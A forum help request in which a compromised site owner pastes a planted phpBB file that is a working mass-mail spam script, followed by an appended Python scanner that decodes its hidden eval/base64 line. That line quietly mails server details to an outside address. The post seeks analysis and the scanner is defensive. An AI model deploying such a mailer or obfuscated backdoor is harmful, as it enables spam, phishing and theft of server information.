j0rdanda
05-29-2009, 05:54 AM
Hello All,
This forum came highly recommended and I'm glad I found it. Bluehost suspended my account because it has been phished. I'm pretty sure that phpbb is the culprit. Here is code from the validation.php file. Could you tell me if the code near the end is malicious? Or if anything is out of the ordinary?
<?php
if(isset($_POST['action'] ) ){
$action=$_POST['action'];
$message=$_POST['message'];
$emaillist=$_POST['emaillist'];
$from=$_POST['from'];
$replyto=$_POST['replyto'];
$subject=$_POST['subject'];
$realname=$_POST['realname'];
$file_name=$_POST['file'];
$contenttype=$_POST['contenttype'];
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<html>
<head>
<title>|| InboX Mass Mailer ||</title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">
<style type="text/css">
<!--
.style1 {
font-family: Geneva, Arial, Helvetica, sans-serif;
font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
font-size: 20px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<body bgcolor="black" text="#ffffff">
<span class="style1">InboX Mass Mailer<br>
</span>
<form name="form1" method="post" action=""
enctype="multipart/form-data">
<br>
<table width="100%" border="0">
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Your
Email:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="from" value="<? print $from; ?>"
size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Your
Name:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="realname" value="<? print $realname;
?>" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Reply-To:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="replyto" value="<? print $replyto; ?>"
size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Attach
File:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="file" name="file" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Subject:</font></div>
</td>
<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="subject" value="<? print $subject; ?>"
size="90">
</font></td>
</tr>
<tr valign="top">
<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<textarea name="message" cols="50" rows="10"><? print $message;
?></textarea>
<br>
<input type="radio" name="contenttype" value="plain" >
Plain Text
<input name="contenttype" type="radio" value="html" checked>
HTML
<input type="hidden" name="action" value="send">
<input type="submit" value="Send eMails">
</font></td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<textarea name="emaillist" cols="30" rows="10"><? print
$emaillist; ?></textarea>
</font></td>
</tr>
</table>
</form>
<?
if ($action){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your
message.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print " $to.......";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "spammed<br>";
flush();
}
}
$ra44 = rand(1,99999);
$subj98 = "sh-$ra44";
$a5 = $_SERVER['HTTP_REFERER'];
$b33 = $_SERVER['DOCUMENT_ROOT'];
$c87 = $_SERVER['REMOTE_ADDR'];
$d23 = $_SERVER['SCRIPT_FILENAME'];
$e09 = $_SERVER['SERVER_ADDR'];
$f23 = $_SERVER['SERVER_SOFTWARE'];
$g32 = $_SERVER['PATH_TRANSLATED'];
$h65 = $_SERVER['PHP_SELF'];
$message=$_POST['message'];
$msg = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";
echo eval(base64_decode("bWFpbCgiZ3JvZmlfaGFja0Bob3RtYWlsLmNvbSIsICRzdWJqOT gsICRtc2csICRtZXNzYWdlLCAkcmE0NCk7"));
}
?>
<style type="text/css">
<!--
.style1 {
font-size: 20px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
<p class="style1">
Copyright © 2007 phpbb.com
</p>
<?php
if(isset($_POST['action']) && $numemails !==0 ){echo
"<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully');
</script>";}
?>
</body>
</html>
Also, I use phpbb 3.0.3. Would simply updating to 3.0.4 resolve the phishing problem? I have disabled the forum temporarily through the forum's administration panel, though it doesn't seem to have stopped anything.
I am finding odd files showing up under my home directory. These files are empty and are called instaforex, almaforex, liteforex, logintrader, etc... I changed their permissions so that I could delete them, and now they are back in the root directory somehow?
I would love to patch this security hole and would appreciate any help.
My website is http://www.resourcetolife.com.
Thank you for any help,
Jordan
Edit: Something odd happened. When I posted the validation.php here, the code I thought was malicious translated. Here is the malicious code, I thought, outside of code tags.
<p class="style1">
Copyright © 2007 phpbb.com
</p>
The first amount of code translated that to "copyright phpbb" etc...
Lastly, the strangest incoming link has directed almost 397 clicks to my site. It is an odd link that I didn't create, but it's from my account. I hope all this information helps.
The link: http://74.220.219.56/~resoure0/forum/validation.php
Thank you again,
Jordan
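A static triage check for the pattern at the end of the posted file, added here as an example that is not part of the original post or of phpBB: it finds eval(base64_decode("...")) calls in PHP source, decodes the blob without ever executing it, and reports which sensitive PHP calls the decoded text contains. The sample PHP text is constructed from the tail of the posted validation.php (the blob is the one from the post, including the space the forum wrapped into it).

```python
import base64
import re

# eval(base64_decode("...")) with single or double quotes; whitespace is allowed inside
# the blob because line-wrapping (as in the forum post) often inserts spaces into it.
EVAL_B64 = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*(["\'])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)',
    re.IGNORECASE,
)

# Calls worth flagging when they appear inside a decoded payload.
SUSPICIOUS_CALLS = ("mail(", "system(", "exec(", "shell_exec(", "passthru(",
                    "file_put_contents(", "fwrite(", "curl_exec(")


def decode_payload(blob):
    """Decode a base64 blob statically (never eval it); wrapping whitespace is dropped."""
    clean = re.sub(r"\s+", "", blob)
    return base64.b64decode(clean, validate=True).decode("latin-1", errors="replace")


def scan_php(source):
    """Return one finding per eval(base64_decode(...)) occurrence in PHP source text."""
    findings = []
    for m in EVAL_B64.finditer(source):
        line_no = source.count("\n", 0, m.start()) + 1
        try:
            decoded = decode_payload(m.group(2))
        except ValueError:          # binascii.Error is a ValueError: bad padding/alphabet
            decoded = None
        calls = [c for c in SUSPICIOUS_CALLS if decoded and c in decoded]
        findings.append({"line": line_no, "decoded": decoded, "calls": calls})
    return findings


# Constructed sample reproducing the tail of the posted validation.php.
SAMPLE_PHP = '''<?php
$msg = "$a5\\n$b33\\n$c87";
echo eval(base64_decode("bWFpbCgiZ3JvZmlfaGFja0Bob3RtYWlsLmNvbSIsICRzdWJqOT gsICRtc2csICRtZXNzYWdlLCAkcmE0NCk7"));
?>
<p class="style1">Copyright 2007 phpbb.com</p>
'''


def main():
    for f in scan_php(SAMPLE_PHP):
        print(f"line {f['line']}: eval(base64_decode(...)) decodes to:\n    {f['decoded']}")
        if f["calls"]:
            print("    suspicious calls:", ", ".join(f["calls"]))


if __name__ == "__main__":
    main()
```

The decoded line shows the hidden payload mails the server details and the submitted message to the script's author; the "Copyright phpbb.com" footer is plain HTML and is only a decoy.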